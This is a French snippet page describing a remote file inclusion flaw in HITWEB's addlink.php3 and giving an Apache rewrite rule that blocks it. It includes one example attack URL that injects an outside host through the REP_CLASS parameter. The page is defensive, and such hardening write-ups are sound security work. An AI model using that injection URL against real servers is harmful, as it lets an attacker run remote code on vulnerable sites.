Bouts de Codes

Inclusion de fichiers distants avec un script de HITWEB

Information sur le code source

Enregistré le 31 Mai 2008 - Vu 4135 fois
Code source zippé: télécharger le zip
Impression: imprimer le code
  • Sociale bookmarking: Digg ce code sur digg.com
  • Bookmark ce code sur del.icio.us
  • Partage ce code sur Facebook
  • Bookmark ce code sur Google
  • Bookmark ce code sur Yahoo
  • Ajoute Inclusion de fichiers distants avec un script de HITWEB
Votre avis: 
 
Ecrit par :  admin
[66] sources en Apache voir
 

Description du code source

Informations sur le code source

Il est possible dans certains cas de faire exécuter du code malveillant avec le script addlink.php3 et un paramètre REP_CLASS. En effet si le paramètre register_globals est à on, la variable $REP_CLASS est initialisée avec le paramètre GET. Comme cette variable sert de préfixe au chemin des includes du script addlink.php3 il est facile d'exécuter un script externe sur votre serveur (remote file include). Les urls sont du type http://www.example.com//addlink.php3?REP_CLASS=http://www.sitepourri.com/page??
Ces deux lignes vous protègent de cette attaque.

Voir également :
» Page d'erreur 403 personnalisée


La meilleur protection reste de mettre register globals à off.

Code Source



.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
.22
.23
   

################################################################################
#                                                                              #
#                         __                   _ __  _                         #
#               __ ______/ /______ _    ______(_) /_(_)__  ___ _               #
#              / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/               #
#              \_,_/_/ /_/_/  \__/|__,__/_/ /_/\__/_/_//_/\_, /                #
#                                                        /___/                 #
#                                                                              #
#                                                                              #
################################################################################
#                                                                              #
# Titre          : Inclusion de fichiers distants avec un script de HITWEB     #
#                                                                              #
# URL            : /scripts41-Apache.htm             #
# Auteur         : admin                                                       #
# Date édition   : 31 Mai 2008                                                 #
#                                                                              #
################################################################################

RewriteCond %{QUERY_STRING} ^(.*&)?REP_CLASS=http://
RewriteRule ^(.+/)?addlink.php3 - [F,L]
Ajouter un commentaire

RSS
snippets

RSS
commentaires
 
Code de sécurité
Attention: Les champs marqués d'une étoile * sont obligatoires
Librairie

Langages de programmation

La librairie est ouverte à tous et elle est accès principalement sur les langages Snippets. Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP.. Plus de 300 références facilement accessibles. Visiter

  • Apache Tomcat 5 : Serveur d'application Java ; Administration sous Windows ou Linux
  • Apache en action
  • Apache (version 2) : Installation, administration et sécurisation
  • Debian GNU/Linux - Services réseaux (Bind DNS, Apache, NFS, Samba, Messagerie...)
  • PHP 5.2 et APACHE 2 - Maîtrisez le développement et le déploiement de votre site web interactif [Nouvelle version]
  • LAMP (Linux, Apache, MySQL, PHP) Pack 4 volumes : Maîtrisez vos applications Web en Open Source
  • Apache Tomcat 6 - Guide d administration du serveur Java EE sous Windows et Linux
  • Précis & Concis : Apache
  • Apache : La Référence
  • Apache 2.0 : Guide de l'administrateur Linux